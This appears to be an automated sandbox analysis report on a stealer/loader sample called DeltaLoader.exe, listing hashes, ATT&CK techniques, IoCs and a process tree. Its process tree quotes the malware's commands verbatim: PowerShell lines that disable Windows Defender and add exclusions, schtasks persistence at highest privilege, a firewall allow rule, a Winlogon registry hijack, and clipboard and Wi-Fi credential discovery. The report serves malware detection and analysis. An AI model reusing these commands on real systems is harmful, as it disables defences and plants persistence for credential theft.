9d84579a8ef038b25ad305a1109d0b00ae98a4fb23e7de01753697843f779983

Resubmissions

05-02-2025 17:47

250205-wc29qsxlat 10

05-02-2025 17:01

250205-vjss7sxpan 10

Analysis

max time kernel
298s
max time network
300s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
05-02-2025 17:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

DeltaLoader.exe
Size

44KB
MD5

50197e452db64d2f815c89ccc3205a29
SHA1

ae614db915c947b4d59ffad9c70f30796746f9b9
SHA256

9d84579a8ef038b25ad305a1109d0b00ae98a4fb23e7de01753697843f779983
SHA512

366ca9fd72578fa78ca87bb5988854d5c0504307cc02cb0169aac089220981f27f52031547a4aa4a1877585802963141e1454ab542a3c7d68531708d8ca54cde
SSDEEP

384:mtSEAIdjiPyK0aq3v3qyMyc0nhjS5Bw5mwMl9eLKLkTQC9LWQyyLnguBih5:KSnIMHjqiecWBCw5NQMekTQ2yqnguy5

Score

10^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\System32\\userinit.exe,C:\\Windows\\Web\\xdwdDelta.exe"	ThirdPartyGUI.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
5968	powershell.exe
1924	powershell.exe
5832	powershell.exe
3736	powershell.exe
5236	powershell.exe
4592	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	javawnew.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Event Triggered Execution: AppInit DLLs 1 TTPs
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes.
persistence privilege_escalation

AppInit DLLs
T1546.010

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
4172	cmd.exe
4404	powershell.exe

Executes dropped EXE 10 IoCs

pid	Process
1620	ThirdPartyGUI.exe
2856	javawnew.exe
1776	javawnew.exe
5812	xdwdDelta.exe
2880	rar.exe
1636	xdwdDelta.exe
2428	xdwdDelta.exe
408	xdwdDelta.exe
4808	xdwdDelta.exe
984	xdwdDelta.exe

Loads dropped DLL 64 IoCs

pid	Process
1776	javawnew.exe
1776	javawnew.exe
1776	javawnew.exe
1776	javawnew.exe
1776	javawnew.exe
1776	javawnew.exe
1776	javawnew.exe
1776	javawnew.exe
1776	javawnew.exe
1776	javawnew.exe
1776	javawnew.exe
1776	javawnew.exe
1776	javawnew.exe
1776	javawnew.exe
1776	javawnew.exe
1776	javawnew.exe
1776	javawnew.exe
1776	javawnew.exe
3460	Process not Found
3036	Process not Found
1796	Process not Found
5812	xdwdDelta.exe
1400	Process not Found
1392	Process not Found
4856	Process not Found
5940	Process not Found
2204	Process not Found
4592	powershell.exe
5884	tasklist.exe
2844	Process not Found
5356	tasklist.exe
5372	Process not Found
4840	Process not Found
3412	tasklist.exe
4404	powershell.exe
3276	WMIC.exe
2824	netsh.exe
344	systeminfo.exe
1032	powershell.exe
6100	Process not Found
4064	Process not Found
2308	Process not Found
3776	Process not Found
4196	Process not Found
920	tasklist.exe
5048	Process not Found
5544	csc.exe
5656	Process not Found
5584	Process not Found
4944	Process not Found
3736	powershell.exe
5288	Process not Found
3128	Process not Found
2928	powershell.exe
3348	Process not Found
1768	getmac.exe
2432	Process not Found
2880	rar.exe
4500	Process not Found
4800	WMIC.exe
1332	Process not Found
1232	WMIC.exe
2176	Process not Found
4824	WMIC.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 4 IoCs

discovery

Process Discovery

T1057

pid	Process
5884	tasklist.exe
5356	tasklist.exe
3412	tasklist.exe
920	tasklist.exe

UPX packed file 48 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x001900000002ab43-162.dat	upx
behavioral1/files/0x001900000002ab41-173.dat	upx
behavioral1/memory/1776-220-0x00007FF99E470000-0x00007FF99E47F000-memory.dmp	upx
behavioral1/files/0x001900000002ab4d-219.dat	upx
behavioral1/files/0x001900000002ab49-218.dat	upx
behavioral1/files/0x001c00000002ab48-217.dat	upx
behavioral1/files/0x001c00000002ab42-214.dat	upx
behavioral1/files/0x001900000002ab3e-213.dat	upx
behavioral1/memory/1776-172-0x00007FF997A00000-0x00007FF997A27000-memory.dmp	upx
behavioral1/files/0x001900000002aafc-170.dat	upx
behavioral1/memory/1776-167-0x00007FF9803A0000-0x00007FF980A05000-memory.dmp	upx
behavioral1/memory/1776-225-0x00007FF995040000-0x00007FF99506B000-memory.dmp	upx
behavioral1/memory/1776-226-0x00007FF9979E0000-0x00007FF9979F9000-memory.dmp	upx
behavioral1/memory/1776-227-0x00007FF994EB0000-0x00007FF994ED5000-memory.dmp	upx
behavioral1/memory/1776-228-0x00007FF994550000-0x00007FF9946CF000-memory.dmp	upx
behavioral1/memory/1776-229-0x00007FF994E90000-0x00007FF994EA9000-memory.dmp	upx
behavioral1/memory/1776-232-0x00007FF994510000-0x00007FF994543000-memory.dmp	upx
behavioral1/memory/1776-231-0x00007FF998B90000-0x00007FF998B9D000-memory.dmp	upx
behavioral1/memory/1776-233-0x00007FF9803A0000-0x00007FF980A05000-memory.dmp	upx
behavioral1/memory/1776-237-0x00007FF997A00000-0x00007FF997A27000-memory.dmp	upx
behavioral1/memory/1776-236-0x00007FF994440000-0x00007FF99450E000-memory.dmp	upx
behavioral1/memory/1776-235-0x00007FF9902C0000-0x00007FF9907F3000-memory.dmp	upx
behavioral1/memory/1776-240-0x00007FF994360000-0x00007FF994413000-memory.dmp	upx
behavioral1/memory/1776-239-0x00007FF997990000-0x00007FF99799D000-memory.dmp	upx
behavioral1/memory/1776-238-0x00007FF994420000-0x00007FF994434000-memory.dmp	upx
behavioral1/memory/1776-347-0x00007FF9979E0000-0x00007FF9979F9000-memory.dmp	upx
behavioral1/memory/1776-415-0x00007FF994EB0000-0x00007FF994ED5000-memory.dmp	upx
behavioral1/memory/1776-427-0x00007FF994550000-0x00007FF9946CF000-memory.dmp	upx
behavioral1/memory/1776-430-0x00007FF994510000-0x00007FF994543000-memory.dmp	upx
behavioral1/memory/1776-441-0x00007FF9803A0000-0x00007FF980A05000-memory.dmp	upx
behavioral1/memory/1776-456-0x00007FF9902C0000-0x00007FF9907F3000-memory.dmp	upx
behavioral1/memory/1776-451-0x00007FF994440000-0x00007FF99450E000-memory.dmp	upx
behavioral1/memory/1776-467-0x00007FF9803A0000-0x00007FF980A05000-memory.dmp	upx
behavioral1/memory/1776-482-0x00007FF9803A0000-0x00007FF980A05000-memory.dmp	upx
behavioral1/memory/1776-508-0x00007FF9902C0000-0x00007FF9907F3000-memory.dmp	upx
behavioral1/memory/1776-507-0x00007FF994360000-0x00007FF994413000-memory.dmp	upx
behavioral1/memory/1776-506-0x00007FF994510000-0x00007FF994543000-memory.dmp	upx
behavioral1/memory/1776-505-0x00007FF998B90000-0x00007FF998B9D000-memory.dmp	upx
behavioral1/memory/1776-504-0x00007FF994E90000-0x00007FF994EA9000-memory.dmp	upx
behavioral1/memory/1776-503-0x00007FF994550000-0x00007FF9946CF000-memory.dmp	upx
behavioral1/memory/1776-502-0x00007FF994EB0000-0x00007FF994ED5000-memory.dmp	upx
behavioral1/memory/1776-501-0x00007FF9979E0000-0x00007FF9979F9000-memory.dmp	upx
behavioral1/memory/1776-500-0x00007FF995040000-0x00007FF99506B000-memory.dmp	upx
behavioral1/memory/1776-499-0x00007FF99E470000-0x00007FF99E47F000-memory.dmp	upx
behavioral1/memory/1776-498-0x00007FF997A00000-0x00007FF997A27000-memory.dmp	upx
behavioral1/memory/1776-497-0x00007FF994440000-0x00007FF99450E000-memory.dmp	upx
behavioral1/memory/1776-495-0x00007FF997990000-0x00007FF99799D000-memory.dmp	upx
behavioral1/memory/1776-494-0x00007FF994420000-0x00007FF994434000-memory.dmp	upx

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\Web\xdwdDelta.exe	ThirdPartyGUI.exe
File created	C:\Windows\xdwd.dll	ThirdPartyGUI.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DeltaLoader.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
5236	cmd.exe
2824	netsh.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4084	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
344	systeminfo.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3016	schtasks.exe
3872	schtasks.exe
1092	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
5348	DeltaLoader.exe
5968	powershell.exe
5968	powershell.exe
1924	powershell.exe
1924	powershell.exe
5832	powershell.exe
5348	DeltaLoader.exe
4592	powershell.exe
4592	powershell.exe
5884	tasklist.exe
5884	tasklist.exe
4592	powershell.exe
4592	powershell.exe
5356	tasklist.exe
5356	tasklist.exe
5832	powershell.exe
5832	powershell.exe
3412	tasklist.exe
3412	tasklist.exe
4592	powershell.exe
4404	powershell.exe
4404	powershell.exe
3276	WMIC.exe
3276	WMIC.exe
2824	netsh.exe
2824	netsh.exe
344	systeminfo.exe
344	systeminfo.exe
1032	powershell.exe
1032	powershell.exe
4404	powershell.exe
4404	powershell.exe
1032	powershell.exe
1032	powershell.exe
4404	powershell.exe
1032	powershell.exe
920	tasklist.exe
920	tasklist.exe
5544	csc.exe
5544	csc.exe
3736	powershell.exe
3736	powershell.exe
3736	powershell.exe
3736	powershell.exe
2928	powershell.exe
2928	powershell.exe
2928	powershell.exe
2928	powershell.exe
1768	getmac.exe
1768	getmac.exe
2880	rar.exe
2880	rar.exe
4800	WMIC.exe
4800	WMIC.exe
1232	WMIC.exe
1232	WMIC.exe
4824	WMIC.exe
4824	WMIC.exe
5236	powershell.exe
5236	powershell.exe
5236	powershell.exe
5236	powershell.exe
4084	WMIC.exe
4084	WMIC.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	5348	DeltaLoader.exe
Token: SeDebugPrivilege	5968	powershell.exe
Token: SeDebugPrivilege	1924	powershell.exe
Token: SeDebugPrivilege	1620	ThirdPartyGUI.exe
Token: SeDebugPrivilege	5832	powershell.exe
Token: SeDebugPrivilege	4592	powershell.exe
Token: SeDebugPrivilege	5884	tasklist.exe
Token: SeDebugPrivilege	5812	xdwdDelta.exe
Token: SeDebugPrivilege	5356	tasklist.exe
Token: SeDebugPrivilege	3412	tasklist.exe
Token: SeIncreaseQuotaPrivilege	3276	WMIC.exe
Token: SeSecurityPrivilege	3276	WMIC.exe
Token: SeTakeOwnershipPrivilege	3276	WMIC.exe
Token: SeLoadDriverPrivilege	3276	WMIC.exe
Token: SeSystemProfilePrivilege	3276	WMIC.exe
Token: SeSystemtimePrivilege	3276	WMIC.exe
Token: SeProfSingleProcessPrivilege	3276	WMIC.exe
Token: SeIncBasePriorityPrivilege	3276	WMIC.exe
Token: SeCreatePagefilePrivilege	3276	WMIC.exe
Token: SeBackupPrivilege	3276	WMIC.exe
Token: SeRestorePrivilege	3276	WMIC.exe
Token: SeShutdownPrivilege	3276	WMIC.exe
Token: SeDebugPrivilege	3276	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3276	WMIC.exe
Token: SeRemoteShutdownPrivilege	3276	WMIC.exe
Token: SeUndockPrivilege	3276	WMIC.exe
Token: SeManageVolumePrivilege	3276	WMIC.exe
Token: 33	3276	WMIC.exe
Token: 34	3276	WMIC.exe
Token: 35	3276	WMIC.exe
Token: 36	3276	WMIC.exe
Token: SeDebugPrivilege	4404	powershell.exe
Token: SeDebugPrivilege	1032	powershell.exe
Token: SeIncreaseQuotaPrivilege	3276	WMIC.exe
Token: SeSecurityPrivilege	3276	WMIC.exe
Token: SeTakeOwnershipPrivilege	3276	WMIC.exe
Token: SeLoadDriverPrivilege	3276	WMIC.exe
Token: SeSystemProfilePrivilege	3276	WMIC.exe
Token: SeSystemtimePrivilege	3276	WMIC.exe
Token: SeProfSingleProcessPrivilege	3276	WMIC.exe
Token: SeIncBasePriorityPrivilege	3276	WMIC.exe
Token: SeCreatePagefilePrivilege	3276	WMIC.exe
Token: SeBackupPrivilege	3276	WMIC.exe
Token: SeRestorePrivilege	3276	WMIC.exe
Token: SeShutdownPrivilege	3276	WMIC.exe
Token: SeDebugPrivilege	3276	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3276	WMIC.exe
Token: SeRemoteShutdownPrivilege	3276	WMIC.exe
Token: SeUndockPrivilege	3276	WMIC.exe
Token: SeManageVolumePrivilege	3276	WMIC.exe
Token: 33	3276	WMIC.exe
Token: 34	3276	WMIC.exe
Token: 35	3276	WMIC.exe
Token: 36	3276	WMIC.exe
Token: SeDebugPrivilege	920	tasklist.exe
Token: SeDebugPrivilege	3736	powershell.exe
Token: SeIncBasePriorityPrivilege	5812	xdwdDelta.exe
Token: SeDebugPrivilege	2928	powershell.exe
Token: SeIncreaseQuotaPrivilege	4800	WMIC.exe
Token: SeSecurityPrivilege	4800	WMIC.exe
Token: SeTakeOwnershipPrivilege	4800	WMIC.exe
Token: SeLoadDriverPrivilege	4800	WMIC.exe
Token: SeSystemProfilePrivilege	4800	WMIC.exe
Token: SeSystemtimePrivilege	4800	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5348 wrote to memory of 5968	5348	DeltaLoader.exe	79
PID 5348 wrote to memory of 5968	5348	DeltaLoader.exe	79
PID 5348 wrote to memory of 5968	5348	DeltaLoader.exe	79
PID 5348 wrote to memory of 1924	5348	DeltaLoader.exe	81
PID 5348 wrote to memory of 1924	5348	DeltaLoader.exe	81
PID 5348 wrote to memory of 1924	5348	DeltaLoader.exe	81
PID 5348 wrote to memory of 1620	5348	DeltaLoader.exe	83
PID 5348 wrote to memory of 1620	5348	DeltaLoader.exe	83
PID 5348 wrote to memory of 2856	5348	DeltaLoader.exe	84
PID 5348 wrote to memory of 2856	5348	DeltaLoader.exe	84
PID 2856 wrote to memory of 1776	2856	javawnew.exe	85
PID 2856 wrote to memory of 1776	2856	javawnew.exe	85
PID 1776 wrote to memory of 3464	1776	javawnew.exe	87
PID 1776 wrote to memory of 3464	1776	javawnew.exe	87
PID 1776 wrote to memory of 4264	1776	javawnew.exe	88
PID 1776 wrote to memory of 4264	1776	javawnew.exe	88
PID 3464 wrote to memory of 5832	3464	cmd.exe	90
PID 3464 wrote to memory of 5832	3464	cmd.exe	90
PID 1620 wrote to memory of 3120	1620	ThirdPartyGUI.exe	92
PID 1620 wrote to memory of 3120	1620	ThirdPartyGUI.exe	92
PID 1620 wrote to memory of 2332	1620	ThirdPartyGUI.exe	93
PID 1620 wrote to memory of 2332	1620	ThirdPartyGUI.exe	93
PID 1620 wrote to memory of 5668	1620	ThirdPartyGUI.exe	96
PID 1620 wrote to memory of 5668	1620	ThirdPartyGUI.exe	96
PID 1776 wrote to memory of 2980	1776	javawnew.exe	98
PID 1776 wrote to memory of 2980	1776	javawnew.exe	98
PID 1776 wrote to memory of 5008	1776	javawnew.exe	99
PID 1776 wrote to memory of 5008	1776	javawnew.exe	99
PID 1620 wrote to memory of 5812	1620	ThirdPartyGUI.exe	102
PID 1620 wrote to memory of 5812	1620	ThirdPartyGUI.exe	102
PID 2332 wrote to memory of 3872	2332	cmd.exe	103
PID 2332 wrote to memory of 3872	2332	cmd.exe	103
PID 1776 wrote to memory of 3916	1776	javawnew.exe	104
PID 1776 wrote to memory of 3916	1776	javawnew.exe	104
PID 1776 wrote to memory of 4172	1776	javawnew.exe	188
PID 1776 wrote to memory of 4172	1776	javawnew.exe	188
PID 4264 wrote to memory of 4592	4264	cmd.exe	107
PID 4264 wrote to memory of 4592	4264	cmd.exe	107
PID 1776 wrote to memory of 1236	1776	javawnew.exe	108
PID 1776 wrote to memory of 1236	1776	javawnew.exe	108
PID 1776 wrote to memory of 5532	1776	javawnew.exe	110
PID 1776 wrote to memory of 5532	1776	javawnew.exe	110
PID 5668 wrote to memory of 1092	5668	cmd.exe	112
PID 5668 wrote to memory of 1092	5668	cmd.exe	112
PID 1776 wrote to memory of 5236	1776	javawnew.exe	184
PID 1776 wrote to memory of 5236	1776	javawnew.exe	184
PID 5008 wrote to memory of 5884	5008	cmd.exe	116
PID 5008 wrote to memory of 5884	5008	cmd.exe	116
PID 2980 wrote to memory of 5356	2980	cmd.exe	117
PID 2980 wrote to memory of 5356	2980	cmd.exe	117
PID 1776 wrote to memory of 3968	1776	javawnew.exe	118
PID 1776 wrote to memory of 3968	1776	javawnew.exe	118
PID 1776 wrote to memory of 5764	1776	javawnew.exe	120
PID 1776 wrote to memory of 5764	1776	javawnew.exe	120
PID 1776 wrote to memory of 5736	1776	javawnew.exe	121
PID 1776 wrote to memory of 5736	1776	javawnew.exe	121
PID 1236 wrote to memory of 3412	1236	cmd.exe	124
PID 1236 wrote to memory of 3412	1236	cmd.exe	124
PID 4172 wrote to memory of 4404	4172	cmd.exe	125
PID 4172 wrote to memory of 4404	4172	cmd.exe	125
PID 5532 wrote to memory of 2004	5532	cmd.exe	126
PID 5532 wrote to memory of 2004	5532	cmd.exe	126
PID 3916 wrote to memory of 3276	3916	cmd.exe	127
PID 3916 wrote to memory of 3276	3916	cmd.exe	127

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 2 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
3140	attrib.exe
4016	attrib.exe

C:\Users\Admin\AppData\Local\Temp\DeltaLoader.exe
"C:\Users\Admin\AppData\Local\Temp\DeltaLoader.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5348
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5968
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1924
- C:\Users\Admin\AppData\Local\Temp\ThirdPartyGUI.exe
  "C:\Users\Admin\AppData\Local\Temp\ThirdPartyGUI.exe"
  2⤵
  - Modifies WinLogon for persistence
  - Executes dropped EXE
  - Drops file in Windows directory
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1620
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" netsh advfirewall firewall add rule name="/48J0ctg08LB0q" dir=in action=allow program="C:\Windows\Web\xdwdDelta.exe" enable=yes & exit
    3⤵
    PID:3120
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd" /c schtasks /create /f /sc minute /mo 1 /tn "Microsoft\Windows\RuntimeOpen" /tr "C:\Windows\Web\xdwdDelta.exe" /RL HIGHEST & exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2332
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /f /sc minute /mo 1 /tn "Microsoft\Windows\RuntimeOpen" /tr "C:\Windows\Web\xdwdDelta.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:3872
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd" /c schtasks /create /f /sc minute /mo 30 /tn "Microsoft\Windows\Setup" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\Web\xdwdDeltaOpen.exe" /RL HIGHEST & exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5668
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /f /sc minute /mo 30 /tn "Microsoft\Windows\Setup" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\Web\xdwdDeltaOpen.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:1092
- - C:\Windows\Web\xdwdDelta.exe
    "C:\Windows\Web\xdwdDelta.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken
    PID:5812
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd" /c schtasks /create /f /sc minute /mo 30 /tn "Microsoft\Windows\Setup" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\Web\xdwdDeltaOpen.exe" /RL HIGHEST & exit
      4⤵
      PID:4912
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc minute /mo 30 /tn "Microsoft\Windows\Setup" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\Web\xdwdDeltaOpen.exe" /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3016
- C:\Users\Admin\AppData\Local\Temp\javawnew.exe
  "C:\Users\Admin\AppData\Local\Temp\javawnew.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2856
- - C:\Users\Admin\AppData\Local\Temp\javawnew.exe
    "C:\Users\Admin\AppData\Local\Temp\javawnew.exe"
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:1776
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\javawnew.exe'"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3464
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\javawnew.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5832
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4264
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        5⤵
        Command and Scripting Interpreter: PowerShell
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4592
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2980
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Loads dropped DLL
        Enumerates processes with tasklist
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5356
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5008
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Loads dropped DLL
        Enumerates processes with tasklist
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5884
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3916
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        5⤵
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3276
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
      4⤵
      Clipboard Data
      Suspicious use of WriteProcessMemory
      PID:4172
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        5⤵
        Clipboard Data
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4404
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1236
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Loads dropped DLL
        Enumerates processes with tasklist
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3412
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5532
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:2004
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
      4⤵
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:5236
    - - C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        5⤵
        Loads dropped DLL
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2824
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "systeminfo"
      4⤵
      PID:3968
    - - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        5⤵
        Loads dropped DLL
        Gathers system information
        Suspicious behavior: EnumeratesProcesses
        
        PID:344
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
      4⤵
      PID:5764
    - - C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
        5⤵
        
        PID:1696
  - - C:\Windows\system32\cmd.exe
